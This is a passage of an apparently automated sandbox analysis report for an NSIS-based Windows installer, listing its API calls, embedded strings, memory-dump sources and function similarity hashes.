                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Similarity
                                                                                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                                                • String ID:
                                                                                • API String ID: 184305955-0
                                                                                • Opcode ID: da28513e2224feb1c808745cddd981e43446dbc6f8a7ab03dd6565fed6e5aadb
                                                                                • Instruction ID: c8c4f9f6fa32ab432123c95edc0b9dc077676c0f3e6a7dc1ab02adf3a8b3c805
                                                                                • Opcode Fuzzy Hash: da28513e2224feb1c808745cddd981e43446dbc6f8a7ab03dd6565fed6e5aadb
                                                                                • Instruction Fuzzy Hash: 54C1D3B1A04205BBDB206F61ED89D2B3A78FB85306F51443EF611B11F1C779A942AB1E
                                                                                APIs
                                                                                • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 0040421C
                                                                                • GetDlgItem.USER32(00000000,000003E8), ref: 00404230
                                                                                • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040424E
                                                                                • GetSysColor.USER32(?), ref: 0040425F
                                                                                • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040426E
                                                                                • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040427D
                                                                                • lstrlenA.KERNEL32(?), ref: 00404280
                                                                                • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040428F
                                                                                • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004042A4
                                                                                • GetDlgItem.USER32(?,0000040A), ref: 00404306
                                                                                • SendMessageA.USER32(00000000), ref: 00404309
                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404334
                                                                                • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404374
                                                                                • LoadCursorA.USER32(00000000,00007F02), ref: 00404383
                                                                                • SetCursor.USER32(00000000), ref: 0040438C
                                                                                • ShellExecuteA.SHELL32(0000070B,open,004226C0,00000000,00000000,00000001), ref: 0040439F
                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 004043AC
                                                                                • SetCursor.USER32(00000000), ref: 004043AF
                                                                                • SendMessageA.USER32(00000111,00000001,00000000), ref: 004043DB
                                                                                • SendMessageA.USER32(00000010,00000000,00000000), ref: 004043EF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Similarity
                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                • String ID: N$\A@$open
                                                                                • API String ID: 3615053054-3795635102
                                                                                • Opcode ID: 0d3f312fefaf2c190e171dfa2e1175f61d5d84c52849205d92d9bfd162526d75
                                                                                • Instruction ID: aa20bcc63d66581fa7bbac4c1809bf2e03719b1a0f02ef32c38fc7c0d03722a0
                                                                                • Opcode Fuzzy Hash: 0d3f312fefaf2c190e171dfa2e1175f61d5d84c52849205d92d9bfd162526d75
                                                                                • Instruction Fuzzy Hash: 3D6191B1A40209BBEF109F61DC45F6A7B69FB84714F108036FB01BA2D1C7B8A951CF98
                                                                                APIs
                                                                                  • Part of subcall function 004061FC: GetModuleHandleA.KERNEL32(?,?,?,00403295,00000009), ref: 0040620E
                                                                                  • Part of subcall function 004061FC: GetProcAddress.KERNEL32(00000000,?), ref: 00406229
                                                                                • lstrcatA.KERNEL32(0042A000,0041FD30,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FD30,00000000,00000002,75DF3410,0042A400,00429000,00000000), ref: 0040385E
                                                                                • lstrlenA.KERNEL32(004226C0,?,?,?,004226C0,00000000,00429400,0042A000,0041FD30,80000001,Control Panel\Desktop\ResourceLocale,00000000,0041FD30,00000000,00000002,75DF3410), ref: 004038D3
                                                                                • lstrcmpiA.KERNEL32(?,.exe), ref: 004038E6
                                                                                • GetFileAttributesA.KERNEL32(004226C0), ref: 004038F1
                                                                                • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00429400), ref: 0040393A
                                                                                  • Part of subcall function 00405DC1: wsprintfA.USER32 ref: 00405DCE
                                                                                • RegisterClassA.USER32(00422EC0), ref: 00403977
                                                                                • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040398F
                                                                                • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039C4
                                                                                • ShowWindow.USER32(00000005,00000000), ref: 004039FA
                                                                                • GetClassInfoA.USER32(00000000,RichEdit20A,00422EC0), ref: 00403A26
                                                                                • GetClassInfoA.USER32(00000000,RichEdit,00422EC0), ref: 00403A33
                                                                                • RegisterClassA.USER32(00422EC0), ref: 00403A3C
                                                                                • DialogBoxParamA.USER32(?,00000000,00403B75,00000000), ref: 00403A5B
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Similarity
                                                                                • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                • API String ID: 1975747703-2904746566
                                                                                • Opcode ID: 1d56fba69deda3eace6a01f267842d5a1cdb9e44690bccd690864acbbeb733b9
                                                                                • Instruction ID: 6c8974e4dfdcf182ca6d095a6101ff5518a0df20e425d3d5ae506d2571b44078
                                                                                • Opcode Fuzzy Hash: 1d56fba69deda3eace6a01f267842d5a1cdb9e44690bccd690864acbbeb733b9
                                                                                • Instruction Fuzzy Hash: 076191B17442007ED620AF659D45F2B3AACEB8475AF40447FF941B22E2C7BC9D029A7D
                                                                                APIs
                                                                                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                • DrawTextA.USER32(00000000,00422F20,000000FF,00000010,00000820), ref: 00401156
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Similarity
                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                • String ID: F
                                                                                • API String ID: 941294808-1304234792
                                                                                • Opcode ID: 7c104425433eee9aa72c8594e5c9845c7e8c7dbb4814f5ad4226ea4ba1dd0cf1
                                                                                • Instruction ID: f6076547c65416f673289c9e9aa760257b54fe90aa12de16c0a46004740ece36
                                                                                • Opcode Fuzzy Hash: 7c104425433eee9aa72c8594e5c9845c7e8c7dbb4814f5ad4226ea4ba1dd0cf1
                                                                                • Instruction Fuzzy Hash: C2419B71804249AFCF058FA4CD459AFBBB9FF45310F00812AF961AA1A0C738EA50DFA5
                                                                                APIs
                                                                                • lstrcpyA.KERNEL32(00421AC0,NUL,?,00000000,?,00000000,00405D3F,?,?), ref: 00405BBB
                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,00405D3F,?,?), ref: 00405BDF
                                                                                • GetShortPathNameA.KERNEL32(?,00421AC0,00000400), ref: 00405BE8
                                                                                  • Part of subcall function 00405A3B: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A4B
                                                                                  • Part of subcall function 00405A3B: lstrlenA.KERNEL32(00000000,?,00000000,00405C98,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A7D
                                                                                • GetShortPathNameA.KERNEL32(00421EC0,00421EC0,00000400), ref: 00405C05
                                                                                • wsprintfA.USER32 ref: 00405C23
                                                                                • GetFileSize.KERNEL32(00000000,00000000,00421EC0,C0000000,00000004,00421EC0,?,?,?,?,?), ref: 00405C5E
                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C6D
                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CA5
                                                                                • SetFilePointer.KERNEL32(004093C8,00000000,00000000,00000000,00000000,004216C0,00000000,-0000000A,004093C8,00000000,[Rename],00000000,00000000,00000000), ref: 00405CFB
                                                                                • GlobalFree.KERNEL32(00000000), ref: 00405D0C
                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D13
                                                                                  • Part of subcall function 00405AD6: GetFileAttributesA.KERNEL32(00000003,00402CF9,0042AC00,80000000,00000003), ref: 00405ADA
                                                                                  • Part of subcall function 00405AD6: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AFC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Similarity
                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                                • String ID: %s=%s$NUL$[Rename]
                                                                                • API String ID: 222337774-4148678300
                                                                                • Opcode ID: 2e3f1d5478f9f0c6b3014663fcb7d6cbfaa562a2a519d3499902ae05c7337469
                                                                                • Instruction ID: f02436ff356463cbad731f06bd7f36315381bbfe77d8bed81a3cf794d1fe08c5
                                                                                • Opcode Fuzzy Hash: 2e3f1d5478f9f0c6b3014663fcb7d6cbfaa562a2a519d3499902ae05c7337469
                                                                                • Instruction Fuzzy Hash: 2231C274604B597BD2207B615D49F6B3A9CEF45758F24013BF905B22D2DA78AC008EBD
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,000003FB), ref: 004044D5
                                                                                • SetWindowTextA.USER32(00000000,?), ref: 004044FF
                                                                                • SHBrowseForFolderA.SHELL32(?,0041F108,?), ref: 004045B0
                                                                                • CoTaskMemFree.OLE32(00000000), ref: 004045BB
                                                                                • lstrcmpiA.KERNEL32(004226C0,0041FD30), ref: 004045ED
                                                                                • lstrcatA.KERNEL32(?,004226C0), ref: 004045F9
                                                                                • SetDlgItemTextA.USER32(?,000003FB,?), ref: 0040460B
                                                                                  • Part of subcall function 0040563D: GetDlgItemTextA.USER32(?,?,00000400,00404642), ref: 00405650
                                                                                  • Part of subcall function 004060CE: CharNextA.USER32(?,*?|<>/":,00000000,00429000,75DF3410,0042A400,00000000,00403206,0042A400,0042A400,0040341B), ref: 00406126
                                                                                  • Part of subcall function 004060CE: CharNextA.USER32(?,?,?,00000000), ref: 00406133
                                                                                  • Part of subcall function 004060CE: CharNextA.USER32(?,00429000,75DF3410,0042A400,00000000,00403206,0042A400,0042A400,0040341B), ref: 00406138
                                                                                  • Part of subcall function 004060CE: CharPrevA.USER32(?,?,75DF3410,0042A400,00000000,00403206,0042A400,0042A400,0040341B), ref: 00406148
                                                                                • GetDiskFreeSpaceA.KERNEL32(0041ED00,?,?,0000040F,?,0041ED00,0041ED00,?,00000001,0041ED00,?,?,000003FB,?), ref: 004046C9
                                                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004046E4
                                                                                  • Part of subcall function 0040483D: lstrlenA.KERNEL32(0041FD30,0041FD30,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404758,000000DF,00000000,00000400,?), ref: 004048DB
                                                                                  • Part of subcall function 0040483D: wsprintfA.USER32 ref: 004048E3
                                                                                  • Part of subcall function 0040483D: SetDlgItemTextA.USER32(?,0041FD30), ref: 004048F6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Similarity
                                                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                • String ID: A
                                                                                • API String ID: 2624150263-3554254475
                                                                                • Opcode ID: 555b0d8a2605e6a55d78fcd569647acd639b7896ddbd0d3dcd57faa20299248c
                                                                                • Instruction ID: 175f10717e4f371f028a94a7e43d857af948bb7b3e906aba32508f1788989df3
                                                                                • Opcode Fuzzy Hash: 555b0d8a2605e6a55d78fcd569647acd639b7896ddbd0d3dcd57faa20299248c
                                                                                • Instruction Fuzzy Hash: 27A18FF1900209ABDB11AFA5CC45AAFB7B8EF85314F14843BF601B72D1D77C9A418B69
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00402CCA
                                                                                • GetModuleFileNameA.KERNEL32(00000000,0042AC00,00000400), ref: 00402CE6
                                                                                  • Part of subcall function 00405AD6: GetFileAttributesA.KERNEL32(00000003,00402CF9,0042AC00,80000000,00000003), ref: 00405ADA
                                                                                  • Part of subcall function 00405AD6: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AFC
                                                                                • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,00429C00,00429C00,0042AC00,0042AC00,80000000,00000003), ref: 00402D2F
                                                                                • GlobalAlloc.KERNEL32(00000040,00409130), ref: 00402E76
                                                                                Strings
                                                                                • Null, xrefs: 00402DAF
                                                                                • soft, xrefs: 00402DA6
                                                                                • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402EBF
                                                                                • Error launching installer, xrefs: 00402D06
                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F0D
                                                                                • Inst, xrefs: 00402D9D
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmp
                                                                                Similarity
                                                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                • API String ID: 2803837635-3016655952
                                                                                • Opcode ID: 6949a2dc81abe6ae8ca3848ee1a274e905e25326872c2b53de3725809208b6fc
                                                                                • Instruction ID: 6560279c47655c84bfe4d90bfb6f1ef804bba6314c77a30d8371cd5976d9e3e8
                                                                                • Opcode Fuzzy Hash: 6949a2dc81abe6ae8ca3848ee1a274e905e25326872c2b53de3725809208b6fc
                                                                                • Instruction Fuzzy Hash: C66103B1A40215ABDB20AF60DE89B9E77B8EB04354F51413BF501B72D1D7BC9E818B9C
APIs
• GetVersion.KERNEL32(?,0041F510,00000000,004050B4,0041F510,00000000), ref: 00405F36
• GetSystemDirectoryA.KERNEL32(004226C0,00000400), ref: 00405FB1
• GetWindowsDirectoryA.KERNEL32(004226C0,00000400), ref: 00405FC4
• SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00406000
• SHGetPathFromIDListA.SHELL32(00000000,004226C0), ref: 0040600E
• CoTaskMemFree.OLE32(00000000), ref: 00406019
• lstrcatA.KERNEL32(004226C0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040603B
• lstrlenA.KERNEL32(004226C0,?,0041F510,00000000,004050B4,0041F510,00000000), ref: 0040608D
Strings
• Software\Microsoft\Windows\CurrentVersion, xrefs: 00405F80
• \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406035
Memory Dump Source
• Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
• String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
• API String ID: 900638850-730719616
APIs
• GetWindowLongA.USER32(?,000000EB), ref: 004040CC
• GetSysColor.USER32(00000000), ref: 004040E8
• SetTextColor.GDI32(?,00000000), ref: 004040F4
• SetBkMode.GDI32(?,?), ref: 00404100
• GetSysColor.USER32(?), ref: 00404113
• SetBkColor.GDI32(?,?), ref: 00404123
• DeleteObject.GDI32(?), ref: 0040413D
• CreateBrushIndirect.GDI32(?), ref: 00404147
Similarity
• API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
• String ID:
• API String ID: 2320649405-0
APIs
• lstrlenA.KERNEL32(0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
• lstrlenA.KERNEL32(00402C8E,0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
• lstrcatA.KERNEL32(0041F510,00402C8E,00402C8E,0041F510,00000000,00000000,00000000), ref: 004050D8
• SetWindowTextA.USER32(0041F510,0041F510), ref: 004050EA
• SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
• SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
• SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138
Similarity
• API ID: MessageSend$lstrlen$TextWindowlstrcat
• String ID:
• API String ID: 2531174081-0
APIs
• DestroyWindow.USER32(?,00000000), ref: 00402C2F
• GetTickCount.KERNEL32 ref: 00402C4D
• wsprintfA.USER32 ref: 00402C7B
  • Part of subcall function 0040507C: lstrlenA.KERNEL32(0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
  • Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
  • Part of subcall function 0040507C: lstrcatA.KERNEL32(0041F510,00402C8E,00402C8E,0041F510,00000000,00000000,00000000), ref: 004050D8
  • Part of subcall function 0040507C: SetWindowTextA.USER32(0041F510,0041F510), ref: 004050EA
  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138
• CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C9F
• ShowWindow.USER32(00000000,00000005), ref: 00402CAD
  • Part of subcall function 00402BFB: MulDiv.KERNEL32(?,00000064,?), ref: 00402C10
Similarity
• API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
• String ID: ... %d%%
• API String ID: 722711167-2449383134
APIs
• SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404962
• GetMessagePos.USER32 ref: 0040496A
• ScreenToClient.USER32(?,?), ref: 00404984
• SendMessageA.USER32(?,00001111,00000000,?), ref: 00404996
• SendMessageA.USER32(?,0000110C,00000000,?), ref: 004049BC
Similarity
• API ID: Message$Send$ClientScreen
• String ID: f
• API String ID: 41195575-1993550816
APIs
• CreateDirectoryA.KERNEL32(?,?,0042A400), ref: 00405585
• GetLastError.KERNEL32 ref: 00405599
• SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004055AE
• GetLastError.KERNEL32 ref: 004055B8
Similarity
• API ID: ErrorLast$CreateDirectoryFileSecurity
• String ID: ds@$ts@
• API String ID: 3449924974-968229870
APIs
• SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B9A
• wsprintfA.USER32 ref: 00402BCE
• SetWindowTextA.USER32(?,?), ref: 00402BDE
• SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BF0
Similarity
• API ID: Text$ItemTimerWindowwsprintf
• String ID: unpacking data: %d%%$verifying installer: %d%%
• API String ID: 1451636040-1158693248
APIs
• GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004061A5
• wsprintfA.USER32 ref: 004061DE
• LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 004061F2
Similarity
• API ID: DirectoryLibraryLoadSystemwsprintf
• String ID: %s%s.dll$UXTHEME$\
• API String ID: 2200240437-4240819195
APIs
• GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040271A
• GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 00402736
• GlobalFree.KERNEL32(?), ref: 0040276F
• GlobalFree.KERNEL32(00000000), ref: 00402782
• CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 0040279A
• DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004027AE
Similarity
• API ID: Global$AllocFree$CloseDeleteFileHandle
• String ID:
• API String ID: 2667972263-0
APIs
• CharNextA.USER32(?,*?|<>/":,00000000,00429000,75DF3410,0042A400,00000000,00403206,0042A400,0042A400,0040341B), ref: 00406126
• CharNextA.USER32(?,?,?,00000000), ref: 00406133
• CharNextA.USER32(?,00429000,75DF3410,0042A400,00000000,00403206,0042A400,0042A400,0040341B), ref: 00406138
• CharPrevA.USER32(?,?,75DF3410,0042A400,00000000,00403206,0042A400,0042A400,0040341B), ref: 00406148
Similarity
• API ID: Char$Next$Prev
• String ID: *?|<>/":
• API String ID: 589700163-165019052
                                                                                APIs
                                                                                • lstrcatA.KERNEL32(00000000,00000000,00409400,00429800,00000000,00000000,00000031), ref: 00401790
                                                                                • CompareFileTime.KERNEL32(-00000014,?,00409400,00409400,00000000,00000000,00409400,00429800,00000000,00000000,00000031), ref: 004017BA
                                                                                  • Part of subcall function 00405E63: lstrcpynA.KERNEL32(?,?,00000400,004032D9,00422F20,NSIS Error), ref: 00405E70
                                                                                  • Part of subcall function 0040507C: lstrlenA.KERNEL32(0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000,?), ref: 004050B5
                                                                                  • Part of subcall function 0040507C: lstrlenA.KERNEL32(00402C8E,0041F510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C8E,00000000), ref: 004050C5
                                                                                  • Part of subcall function 0040507C: lstrcatA.KERNEL32(0041F510,00402C8E,00402C8E,0041F510,00000000,00000000,00000000), ref: 004050D8
                                                                                  • Part of subcall function 0040507C: SetWindowTextA.USER32(0041F510,0041F510), ref: 004050EA
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405110
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040512A
                                                                                  • Part of subcall function 0040507C: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405138
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 1941528284-0
                                                                                • Opcode ID: 6608a40cbad04134a8f8594ebb4ccf2e27175878a4a96e62a378f4abadff5d1a
                                                                                • Instruction ID: 7023b4eef350b7a4ada653e1e4d9b110c77c4e6d7f727d83c91ff2b2eb458513
                                                                                • Opcode Fuzzy Hash: 6608a40cbad04134a8f8594ebb4ccf2e27175878a4a96e62a378f4abadff5d1a
                                                                                • Instruction Fuzzy Hash: 3941C472A00514BACF107BB5CC85EAF3668EF45369B20863BF121B21E1D67C4A41CBAD
                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                                                                • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                                                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                                                                Memory Dump Source
                                                                                • Source File: 00000083.00000002.42908945970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000083.00000002.42908922675.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42908974501.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909002223.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000083.00000002.42909028951.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Similarity
                                                                                • API ID: Close$DeleteEnumOpen
                                                                                • String ID:
                                                                                • API String ID: 1912718029-0
                                                                                • Opcode ID: ba179b4ab06ec51544505c7bb4ef6d82f25395ff453b8f9fc11c3f7a3e81ed6a
                                                                                • Instruction ID: 2c69578fec59b839bbbb6554d628e5ed2d7180fb0bd31e8d2d7d3181fb534eb1
                                                                                • Opcode Fuzzy Hash: ba179b4ab06ec51544505c7bb4ef6d82f25395ff453b8f9fc11c3f7a3e81ed6a
                                                                                • Instruction Fuzzy Hash: 93113D71A00108BEDF229F90DE89DAA3B7DEB54349B504436F901F10A0D775AE51EB69
                                                                                APIs
                                                                                • GetDlgItem.USER32(?), ref: 00401CE2
                                                                                • GetClientRect.USER32(00000000,?), ref: 00401CEF
